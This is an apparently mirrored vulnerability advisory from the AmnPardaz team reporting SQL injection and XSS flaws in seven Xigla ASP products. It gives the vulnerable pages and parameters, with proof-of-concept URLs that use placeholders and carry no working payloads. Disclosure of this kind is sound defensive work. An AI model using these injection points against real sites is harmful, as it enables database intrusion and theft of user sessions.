AOH :: HP Unsorted X :: BX3483.HTM

Xigla Multiple Products - Multiple Vulnerabilities



Xigla Multiple Products - Multiple Vulnerabilities
Xigla Multiple Products - Multiple Vulnerabilities



########################## www.BugReport.ir #######################################=0D 
#=0D
#      AmnPardaz Security Research Team=0D
#=0D
# Title: Xigla Multiple Products - Multiple Vulnerabilities=0D
# Vendor: http://www.xigla.com/=0D 
# Exploit: N/A=0D
# Impact: Medium=0D
# Fix: N/A=0D
# Original Advisory: http://bugreport.ir/index.php?/41=0D 
###################################################################################=0D
=0D
=0D
####################=0D
1. Description:=0D
####################=0D
=0D
	Xigla company has several web based products (From content management systems to live help solutions) to enhance the websites.=0D
		1.1. Absolute Live Support XE:   Absolute Live Support is a live customer support software for your web site that enables visitors to instantaneously communicate with your customer service personnel.=0D
		1.2. Absolute News Manager XE:   Absolute News Manager is a powerful web site news and article content management system.=0D
		1.3. Absolute Banner Manager XE: Absolute Banner Manager is the most complete, robust and easy to use web based banner management and ad tracking software.=0D
		1.4. Absolute Form Processor XE: The Absolute Form Processor is a powerful tool for processing your web based HTML forms. You don=92t have to waste time developing server code, validation rules , form mailers or auto responders for your web forms, this application does all this for you.=0D
		1.5. Absolute Image Gallery XE:  The complete and powerful media gallery software that makes creating and maintaining images and multimedia galleries a snap. The code resides on your web server and searches your web site for new images and files to add to your gallery.=0D
		1.6. Absolute Poll Manager XE:   Absolute Poll Manager is a complete and easy-to-use survey software for dynamically adding polls and surveys to your site while creating interest among your site visitors and gathering valuable information about what they think.=0D
		1.7. Absolute Control Panel XE:  Absolute Control Panel is a web based interfacing system specially designed to provide centralized access to your web based applications and Xigla application modules. It has been developed as a practical access point to our web based suite of solutions on your web sites.=0D
	 =0D
=0D
####################=0D
2. Vulnerabilities:=0D
####################=0D
    2.1. Absolute Live Support XE (ASP version 5.1) (admin)=0D
		2.1.1. SQL Injection in "search.asp" by "orderby" parameter.=0D
			POC: =0D
http://[URL]/xlaabsolutels/search.asp?orderby=[SQL INJECTION]=0D 
			=0D
		2.1.2. XSS in "search.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsolutels/admin/search.asp=0D 
=0D
    2.2. Absolute News Manager XE (ASP version 3.2) (admin)=0D
		2.2.1 	SQL Injection in "search.asp".=0D
			POC:=0D
http://[URL]/xlaabsolutenm/search.asp?orderby=[SQL INJECTION]=0D 
		=0D
		2.2.1. XSS in "anmviewer.asp", "search.asp","editarticleX.asp","publishers.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsolutenm/admin/anmviewer.asp=0D 
http://[URL]/xlaabsolutenm/admin/search.asp=0D 
http://[URL]/xlaabsolutenm/admin/editarticleX.asp=0D 
http://[URL]/xlaabsolutenm/admin/publishers.asp=0D 
			=0D
    2.3. Absolute Banner Manager XE (ASP version) (admin)=0D
		2.3.1. SQL Injection in "searchbanners.asp".=0D
			POC:=0D
http://[URL]/xlaabsolutebm/searchbanners.asp?orderby=[SQL INJECTION]=0D 
			=0D
		2.3.2. XSS in "searchbanners.asp","listadvertisers.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsolutebm/admin/searchbanners.asp=0D 
http://[URL]/xlaabsolutebm/admin/listadvertisers.asp=0D 
=0D
    2.4. Absolute Form Processor XE (ASP version 4.0) (admin)=0D
		2.4.1. SQL Injection in "search.asp".=0D
			POC:=0D
http://[URL]/absolutefp/search.asp?orderby=[SQL INJECTION]=0D 
		=0D
		2.4.2. XSS in "search.asp", "users.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/absolutefp/admin/search.asp=0D 
http://[URL]/absolutefp/admin/users.asp=0D 
   =0D
    2.5. Absolute Image Gallery XE=0D
		2.5.1. SQL Injection in "gallery.asp".=0D
			POC:=0D
http://[URL]/xlaabsoluteig/gallery.asp?action=viewimage&categoryid=[SQL INJECTION]=0D 
		=0D
		2.5.2. XSS in "gallery.asp", "search.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsoluteig/admin/search.asp=0D 
			=0D
    2.6. Absolute Poll Manager XE (admin)=0D
		2.6.1. SQL Injection in "search.asp".=0D
			POC:=0D
http://[URL]/xlaabsolutepm/search.asp?orderby=[SQL INJECTION]=0D 
			=0D
		2.6.2. XSS in "search.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsolutepm/admin/search.asp=0D 
    2.7. Absolute Control Panel XE=0D
		2.7.1 XSS in "admin/users.asp" (all fields are vulnerable).=0D
			POC:=0D
http://[URL]/xlaabsolutecp/users.asp=0D 
			=0D
####################=0D
3. Solution:=0D
####################=0D
	Edit the source code to ensure that all inputs are properly sanitised.=0D
####################=0D
4. Credit :=0D
####################=0D
AmnPardaz Security Research Team=0D
Contact: admin[4t}bugreport{d0t]ir=0D
www.BugReport.ir=0D 
www.AmnPardaz.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.